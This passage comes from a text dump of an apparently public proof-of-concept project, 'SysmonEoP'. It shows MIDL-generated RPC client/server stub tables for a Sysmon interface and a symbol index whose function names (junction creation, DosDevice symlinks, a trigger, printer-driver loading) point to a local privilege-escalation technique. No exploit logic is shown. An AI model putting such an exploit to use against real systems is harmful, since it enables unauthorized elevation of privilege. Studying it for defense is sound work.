        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 2 /* 0x2 */,
        (NDR64_UINT16) 8 /* 0x8 */
    },
    { 
    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
        { 
        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
            0x72,    /* FC64_BIND_PRIMITIVE */
            (NDR64_UINT8) 0 /* 0x0 */,
            0 /* 0x0 */,   /* Stack offset */
            (NDR64_UINT8) 0 /* 0x0 */,
            (NDR64_UINT8) 0 /* 0x0 */
        },
        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */
    },
    { 
    /* arg_0 */      /* parameter arg_0 */
        &__midl_frag5,
        { 
        /* arg_0 */
            0,
            0,
            0,
            1,
            0,
            0,
            1,
            1,
            0,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* [in], Basetype, ByValue */
        (NDR64_UINT16) 0 /* 0x0 */,
        8 /* 0x8 */,   /* Stack offset */
    },
    { 
    /* arg_1 */      /* parameter arg_1 */
        &__midl_frag7,
        { 
        /* arg_1 */
            1,
            1,
            0,
            1,
            0,
            0,
            0,
            0,
            1,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* MustSize, MustFree, [in], SimpleRef */
        (NDR64_UINT16) 0 /* 0x0 */,
        16 /* 0x10 */,   /* Stack offset */
    }
};

static const __midl_frag2_t __midl_frag2 =
{ 
/* Proc0 */
    { 
    /* Proc0 */      /* procedure Proc0 */
        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */
        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */
        (NDR64_UINT32) 0 /* 0x0 */,
        (NDR64_UINT32) 8 /* 0x8 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 1 /* 0x1 */,
        (NDR64_UINT16) 8 /* 0x8 */
    },
    { 
    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
        { 
        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
            0x72,    /* FC64_BIND_PRIMITIVE */
            (NDR64_UINT8) 0 /* 0x0 */,
            0 /* 0x0 */,   /* Stack offset */
            (NDR64_UINT8) 0 /* 0x0 */,
            (NDR64_UINT8) 0 /* 0x0 */
        },
        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */
    },
    { 
    /* long */      /* parameter long */
        &__midl_frag5,
        { 
        /* long */
            0,
            0,
            0,
            0,
            1,
            1,
            1,
            1,
            0,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* [out], IsReturn, Basetype, ByValue */
        (NDR64_UINT16) 0 /* 0x0 */,
        8 /* 0x8 */,   /* Stack offset */
    }
};

static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;


#include "poppack.h"


static const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =
    {
    &__midl_frag2,
    &__midl_frag4
    };


static const MIDL_STUB_DESC DefaultIfName_StubDesc = 
    {
    (void *)& DefaultIfName___RpcServerInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    0,
    0,
    0,
    0,
    0,
    sysmon__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x60001, /* Ndr library version */
    0,
    0x801026e, /* MIDL Version 8.1.622 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x2000001, /* MIDL flag */
    0, /* cs routines */
    (void *)& DefaultIfName_ServerInfo,   /* proxy/server info */
    0
    };

static const RPC_DISPATCH_FUNCTION DefaultIfName_NDR64__table[] =
    {
    NdrServerCallAll,
    NdrServerCallAll,
    0
    };
static const RPC_DISPATCH_TABLE DefaultIfName_NDR64__v1_0_DispatchTable = 
    {
    2,
    (RPC_DISPATCH_FUNCTION*)DefaultIfName_NDR64__table
    };

static const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = 
    {
    {
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
    sysmon__MIDL_ProcFormatString.Format,
    DefaultIfName_FormatStringOffsetTable,
    sysmon__MIDL_TypeFormatString.Format,
    0,
    0,
    0
    }
    ,{
    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
    (RPC_DISPATCH_TABLE*)&DefaultIfName_NDR64__v1_0_DispatchTable,
    0 ,
    (unsigned short *) DefaultIfName_Ndr64ProcTable,
    0,
    0,
    0,
    0
    }
    };


static const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = 
    {
    (SERVER_ROUTINE)Proc0,
    (SERVER_ROUTINE)Proc1
    };

static const MIDL_SERVER_INFO DefaultIfName_ServerInfo = 
    {
    &DefaultIfName_StubDesc,
    DefaultIfName_ServerRoutineTable,
    sysmon__MIDL_ProcFormatString.Format,
    (unsigned short *) DefaultIfName_FormatStringOffsetTable,
    0,
    (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax,
    2,
    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo
    };
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif


#endif /* defined(_M_AMD64)*/

SYMBOL INDEX (75 symbols across 8 files)

FILE: v1/SysmonEoP/def.h
  type REPARSE_DATA_BUFFER (line 42) | typedef struct _REPARSE_DATA_BUFFER {
  type OBJECT_DIRECTORY_INFORMATION (line 67) | typedef struct _OBJECT_DIRECTORY_INFORMATION {
  type NTSYSAPI (line 75) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCE...
  type NTSYSAPI (line 76) | typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING Dest...
  type NTSYSAPI (line 77) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE Dir...
  type NTSYSAPI (line 78) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_      HAND...
  type NTSYSCALLAPI (line 79) | typedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE  File...

FILE: v1/SysmonEoP/main.cpp
  function wmain (line 4) | int wmain(int argc, wchar_t* argv[])
  function load (line 71) | void load() {
  function BOOL (line 89) | BOOL CreateJunction(HANDLE hDir, LPCWSTR target) {
  function BOOL (line 129) | BOOL DeleteJunction(HANDLE handle) {
  function BOOL (line 152) | BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
  function BOOL (line 166) | BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
  function LPWSTR (line 181) | LPWSTR Find() {
  function Trigger (line 234) | void Trigger(LPWSTR alpc)
  function LPWSTR (line 260) | LPWSTR  BuildPath(LPCWSTR path) {
  function BOOL (line 265) | BOOL AddPrinterDriverWmi() {

FILE: v1/SysmonEoP/sysmon_c.c
  type sysmon_MIDL_TYPE_FORMAT_STRING (line 40) | typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
  type sysmon_MIDL_PROC_FORMAT_STRING (line 46) | typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
  type sysmon_MIDL_EXPR_FORMAT_STRING (line 52) | typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
  function Proc0 (line 99) | long Proc0(
  function Proc1 (line 115) | void Proc1(
  type __midl_frag7_t (line 264) | typedef
  type __midl_frag6_t (line 269) | typedef
  type NDR64_FORMAT_CHAR (line 274) | typedef
  type __midl_frag4_t (line 279) | typedef
  type __midl_frag2_t (line 290) | typedef
  type NDR64_FORMAT_UINT32 (line 300) | typedef

FILE: v1/SysmonEoP/sysmon_s.c
  type sysmon_MIDL_TYPE_FORMAT_STRING (line 39) | typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
  type sysmon_MIDL_PROC_FORMAT_STRING (line 45) | typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
  type sysmon_MIDL_EXPR_FORMAT_STRING (line 51) | typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
  type __midl_frag7_t (line 238) | typedef
  type __midl_frag6_t (line 243) | typedef
  type NDR64_FORMAT_CHAR (line 248) | typedef
  type __midl_frag4_t (line 253) | typedef
  type __midl_frag2_t (line 264) | typedef
  type NDR64_FORMAT_UINT32 (line 274) | typedef

FILE: v2/SysmonEoP/def.h
  type REPARSE_DATA_BUFFER (line 40) | typedef struct _REPARSE_DATA_BUFFER {
  type OBJECT_DIRECTORY_INFORMATION (line 65) | typedef struct _OBJECT_DIRECTORY_INFORMATION {
  type NTSYSAPI (line 73) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCE...
  type NTSYSAPI (line 74) | typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING Dest...
  type NTSYSAPI (line 75) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE Dir...
  type NTSYSAPI (line 76) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_      HAND...
  type NTSYSCALLAPI (line 77) | typedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE  File...

FILE: v2/SysmonEoP/main.cpp
  function wmain (line 4) | int wmain(int argc, wchar_t* argv[])
  function VOID (line 61) | VOID SetJunction() {
  function load (line 78) | void load() {
  function BOOL (line 96) | BOOL CreateJunction(HANDLE hDir, LPCWSTR target) {
  function BOOL (line 136) | BOOL DeleteJunction(HANDLE handle) {
  function BOOL (line 159) | BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
  function BOOL (line 173) | BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
  function LPWSTR (line 188) | LPWSTR Find() {
  function Trigger (line 241) | void Trigger(LPWSTR alpc)
  function LPWSTR (line 266) | LPWSTR  BuildPath(LPCWSTR path) {
  function BOOL (line 271) | BOOL AddPrinterDriverWmi() {

FILE: v2/SysmonEoP/sysmon_c.c
  type sysmon_MIDL_TYPE_FORMAT_STRING (line 40) | typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
  type sysmon_MIDL_PROC_FORMAT_STRING (line 46) | typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
  type sysmon_MIDL_EXPR_FORMAT_STRING (line 52) | typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
  function Proc0 (line 99) | long Proc0(
  function Proc1 (line 115) | void Proc1(
  type __midl_frag7_t (line 264) | typedef
  type __midl_frag6_t (line 269) | typedef
  type NDR64_FORMAT_CHAR (line 274) | typedef
  type __midl_frag4_t (line 279) | typedef
  type __midl_frag2_t (line 290) | typedef
  type NDR64_FORMAT_UINT32 (line 300) | typedef

FILE: v2/SysmonEoP/sysmon_s.c
  type sysmon_MIDL_TYPE_FORMAT_STRING (line 39) | typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
  type sysmon_MIDL_PROC_FORMAT_STRING (line 45) | typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
  type sysmon_MIDL_EXPR_FORMAT_STRING (line 51) | typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
  type __midl_frag7_t (line 238) | typedef
  type __midl_frag6_t (line 243) | typedef
  type NDR64_FORMAT_CHAR (line 248) | typedef
  type __midl_frag4_t (line 253) | typedef
  type __midl_frag2_t (line 264) | typedef
  type NDR64_FORMAT_UINT32 (line 274) | typedef


Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.
